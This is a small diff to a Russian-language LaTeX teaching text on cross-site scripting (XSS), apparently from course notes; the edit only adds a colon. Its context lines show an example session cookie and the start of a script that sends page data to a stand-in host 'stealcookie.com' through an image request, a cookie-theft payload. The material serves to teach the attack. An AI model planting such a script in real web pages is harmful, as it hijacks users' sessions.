--- a/xss.tex
+++ b/xss.tex
@@ -18,7 +18,7 @@
 auth=AJHVML43LDSL42SC6DF;
 \end{verbatim} \end{center}
 
-Пусть текстовое сообщение, размещённое пользователем, содержит скрипт, помещающий на странице <<изображение>>, расположенное по некоему адресу
+Пусть текстовое сообщение, размещённое пользователем, содержит скрипт, помещающий на странице <<изображение>>, расположенное по некоему адресу:
 \begin{verbatim}
 <script>
   new Image().src = "http://stealcookie.com?c=" +
